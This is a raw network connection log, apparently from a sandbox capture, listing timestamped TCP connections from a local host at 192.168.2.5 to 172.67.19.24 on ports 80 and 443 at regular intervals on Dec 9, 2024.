                                                            Dec 9, 2024 14:13:18.958108902 CET49869443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:18.958340883 CET49869443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:18.958350897 CET44349869172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:19.005414009 CET4986680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:20.169433117 CET44349869172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:20.171540976 CET49869443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:20.171569109 CET44349869172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:20.624151945 CET44349869172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:20.624270916 CET44349869172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:20.624324083 CET49869443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:20.624831915 CET49869443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:25.631059885 CET4986180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:25.631211042 CET4986680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:25.631917953 CET4988580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:25.750766993 CET8049861172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:25.751074076 CET4986180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:25.751200914 CET8049885172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:25.751213074 CET8049866172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:25.751281023 CET4988580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:25.751298904 CET4986680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:25.751452923 CET4988580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:25.870702982 CET8049885172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:26.862850904 CET8049885172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:26.864495993 CET49889443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:26.864550114 CET44349889172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:26.864618063 CET49889443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:26.865489960 CET49889443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:26.865510941 CET44349889172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:26.867038012 CET49889443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:26.876905918 CET4989080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:26.911341906 CET44349889172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:26.911680937 CET4988580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:26.996351004 CET8049890172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:26.996488094 CET4989080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:27.066998959 CET4989080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:27.186348915 CET8049890172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:28.077914953 CET44349889172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:28.077994108 CET49889443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:28.121633053 CET8049890172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:28.122627974 CET49894443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:28.122664928 CET44349894172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:28.122721910 CET49894443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:28.123054981 CET49894443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:28.123068094 CET44349894172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:28.161659956 CET4989080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:29.333914995 CET44349894172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:29.334009886 CET49894443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:29.335423946 CET49894443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:29.335441113 CET44349894172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:29.335695982 CET44349894172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:29.337162018 CET49894443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:29.383341074 CET44349894172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:29.787369967 CET44349894172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:29.787465096 CET44349894172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:29.787545919 CET49894443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:29.792826891 CET49894443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:34.803478956 CET4989080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:34.803930998 CET4988580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:34.804466009 CET4991180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:34.923378944 CET8049890172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:34.923444986 CET4989080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:34.923764944 CET8049911172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:34.923835993 CET4991180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:34.924084902 CET8049885172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:34.924129963 CET4988580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:34.925534964 CET4991180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:35.044843912 CET8049911172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:36.073672056 CET8049911172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:36.074651957 CET49914443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:36.074711084 CET44349914172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:36.074832916 CET49914443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:36.074995041 CET49914443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:13:36.075005054 CET44349914104.20.4.235192.168.2.5
                                                            Dec 9, 2024 14:13:36.075067997 CET49914443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:13:36.076056004 CET49914443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:13:36.076062918 CET4991580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:36.117240906 CET4991180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:36.196094990 CET8049915172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:36.196234941 CET4991580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:36.196400881 CET4991580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:36.315808058 CET8049915172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:37.294008017 CET8049915172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:37.295330048 CET49919443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:37.295377970 CET44349919172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:37.295439005 CET49919443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:37.295741081 CET49919443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:37.295753002 CET44349919172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:37.349148035 CET4991580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:38.506788969 CET44349919172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:38.509308100 CET49919443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:38.509340048 CET44349919172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:38.962848902 CET44349919172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:38.962973118 CET44349919172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:38.963036060 CET49919443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:39.027694941 CET49919443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:44.037214994 CET4991180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:44.037223101 CET4991580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:44.038141012 CET4993480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:44.156959057 CET8049911172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:44.157068968 CET4991180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:44.157650948 CET8049915172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:44.157727957 CET8049934172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:44.157814026 CET4991580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:44.157816887 CET4993480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:44.159759998 CET4993480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:44.279073000 CET8049934172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:45.273494959 CET8049934172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:45.274640083 CET49937443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:45.274691105 CET44349937172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:45.274772882 CET49937443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:45.275693893 CET4993880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:45.394968033 CET8049938172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:45.395054102 CET4993880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:45.395200014 CET4993880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:45.411647081 CET4993480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:45.514421940 CET8049938172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:46.809268951 CET8049938172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:46.811350107 CET49942443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:46.811397076 CET44349942172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:46.811464071 CET49942443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:46.811997890 CET49942443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:46.812014103 CET44349942172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:46.911653042 CET4993880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:46.921603918 CET8049938172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:46.921704054 CET4993880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:48.027384996 CET44349942172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:48.031265974 CET49942443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:48.031305075 CET44349942172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:48.479868889 CET44349942172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:48.479980946 CET44349942172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:48.483411074 CET49942443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:48.487262011 CET49942443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:53.501411915 CET4993880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:53.621165991 CET8049938172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:53.621272087 CET4993880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:53.622653008 CET4993480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:53.651460886 CET4995980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:53.742752075 CET8049934172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:53.742805958 CET4993480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:53.771140099 CET8049959172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:53.771207094 CET4995980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:53.789258957 CET4995980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:53.909060001 CET8049959172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:54.860887051 CET8049959172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:54.862298012 CET49963443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:54.862366915 CET44349963172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:54.862430096 CET49963443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:54.863539934 CET4996480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:54.927268028 CET4995980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:54.982990026 CET8049964172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:54.983721018 CET4996480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:54.984843016 CET4996480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:55.104118109 CET8049964172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:56.079979897 CET8049964172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:56.099564075 CET49968443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:56.099639893 CET44349968172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:56.099937916 CET49968443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:56.100287914 CET49968443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:56.100310087 CET44349968172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:56.131269932 CET4996480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:57.322247028 CET44349968172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:57.324311972 CET49968443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:57.324351072 CET44349968172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:57.774590015 CET44349968172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:57.774687052 CET44349968172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:57.774772882 CET49968443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:57.775263071 CET49968443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:02.787266970 CET4995980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:02.787636042 CET4996480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:02.788124084 CET4998580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:02.907367945 CET8049959172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:02.907413960 CET8049985172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:02.907433033 CET4995980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:02.907481909 CET4998580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:02.907685995 CET4998580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:02.908324957 CET8049964172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:02.908488035 CET4996480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:03.026954889 CET8049985172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:04.005120993 CET8049985172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:04.008433104 CET49987443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:04.008433104 CET49987443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:14:04.008462906 CET44349987172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:04.008472919 CET44349987104.20.4.235192.168.2.5
                                                            Dec 9, 2024 14:14:04.008548021 CET49987443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:04.008548021 CET49987443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:14:04.008559942 CET44349987104.20.4.235192.168.2.5
                                                            Dec 9, 2024 14:14:04.008589029 CET49987443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:14:04.011284113 CET4998880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:04.130407095 CET4998580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:04.130778074 CET8049988172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:04.130947113 CET4998880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:04.131097078 CET4998880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:04.251151085 CET8049988172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:05.225503922 CET8049988172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:05.227195024 CET49994443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:05.227235079 CET44349994172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:05.227300882 CET49994443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:05.227709055 CET49994443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:05.227720022 CET44349994172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:05.317918062 CET4998880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:06.454421997 CET44349994172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:06.459064960 CET49994443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:06.459083080 CET44349994172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:06.899029970 CET44349994172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:06.899127007 CET44349994172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:06.899180889 CET49994443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:06.899837971 CET49994443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:11.912602901 CET4998580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:11.912606001 CET4998880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:11.914387941 CET5001080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:12.032263041 CET8049985172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:12.032613039 CET8049988172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:12.032700062 CET4998580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:12.032701969 CET4998880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:12.033633947 CET8050010172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:12.033742905 CET5001080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:12.035274029 CET5001080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:12.154479027 CET8050010172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:13.143537998 CET8050010172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:13.144747972 CET50012443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:13.144789934 CET44350012172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:13.144845963 CET50012443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:13.145534039 CET5001080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:13.304018021 CET8050010172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:13.573201895 CET8050010172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:13.575050116 CET50013443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:13.575093031 CET44350013172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:13.575155020 CET50013443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:13.576683998 CET50013443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:13.576715946 CET44350013172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:13.577322006 CET50013443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:13.623327971 CET44350013172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:13.630368948 CET5001080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:14.787194967 CET44350013172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:14.787311077 CET50013443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:18.600373983 CET5002180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:18.600385904 CET5001080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:18.720012903 CET8050021172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:18.720102072 CET5002180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:18.720252991 CET5002180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:18.720262051 CET8050010172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:18.721355915 CET5001080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:18.840056896 CET8050021172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:19.818943024 CET8050021172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:19.825155973 CET5002180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:19.944494963 CET8050021172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:20.148924112 CET8050021172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:20.150202990 CET50022443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:14:20.150202990 CET50022443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:20.150259018 CET44350022104.20.4.235192.168.2.5
                                                            Dec 9, 2024 14:14:20.150274038 CET44350022172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:20.150345087 CET50022443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:14:20.150346041 CET50022443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:20.151097059 CET50022443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:14:20.317838907 CET5002180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:21.155345917 CET44350022172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:21.155405998 CET50022443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:25.162516117 CET5002180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:25.164638996 CET5002380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:25.286724091 CET8050021172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:25.286778927 CET5002180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:25.288827896 CET8050023172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:25.288885117 CET5002380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:25.289118052 CET5002380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:25.409570932 CET8050023172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:26.385080099 CET8050023172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:26.400290966 CET50024443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:26.400322914 CET44350024172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:26.400589943 CET50024443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:26.410753965 CET50024443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:26.410753965 CET50024443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:26.410778999 CET44350024172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:26.455321074 CET44350024172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:26.523181915 CET5002380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:26.626663923 CET5002580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:26.626668930 CET5002380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:26.746097088 CET8050025172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:26.746206045 CET5002580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:26.746670961 CET8050023172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:26.747267962 CET5002380192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:26.752990961 CET5002580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:26.872307062 CET8050025172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:27.621460915 CET44350024172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:27.621592045 CET50024443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:27.621603966 CET44350024172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:27.621648073 CET50024443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:27.621659040 CET50024443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:27.842161894 CET8050025172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:27.927129984 CET5002580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:32.849302053 CET5002580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:32.970089912 CET8050025172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:32.970153093 CET5002580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:32.991389990 CET5002680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:33.110739946 CET8050026172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:33.110824108 CET5002680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:33.110985041 CET5002680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:33.230438948 CET8050026172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:34.202969074 CET8050026172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:34.203576088 CET5002680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:34.323014021 CET8050026172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:34.525414944 CET8050026172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:34.530131102 CET50027443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:34.530178070 CET44350027172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:34.530400991 CET50027443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:34.583291054 CET5002680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:39.536762953 CET5002680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:39.537765980 CET5002880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:39.656903028 CET8050026172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:39.656991005 CET5002680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:39.657167912 CET8050028172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:39.657248974 CET5002880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:39.657366991 CET5002880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:39.776674032 CET8050028172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:40.757745028 CET8050028172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:40.758641958 CET5002880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:40.879460096 CET8050028172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:41.078350067 CET8050028172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:41.079722881 CET50029443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:41.079771996 CET44350029172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:41.079840899 CET50029443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:41.130094051 CET5002880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:46.084485054 CET5002880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:46.084485054 CET5003080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:46.205039978 CET8050030172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:46.205282927 CET5003080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:46.205318928 CET8050028172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:46.205348015 CET5003080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:46.205454111 CET5002880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:46.324721098 CET8050030172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:47.302575111 CET8050030172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:47.304136038 CET50031443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:47.304203987 CET44350031172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:47.304261923 CET50031443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:47.304694891 CET50031443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:47.304712057 CET44350031172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:47.305586100 CET50031443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:47.313771963 CET5003080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:14:47.351341009 CET44350031172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:47.433123112 CET8050030172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:14:47.635365009 CET8050030172.67.19.24192.168.2.5
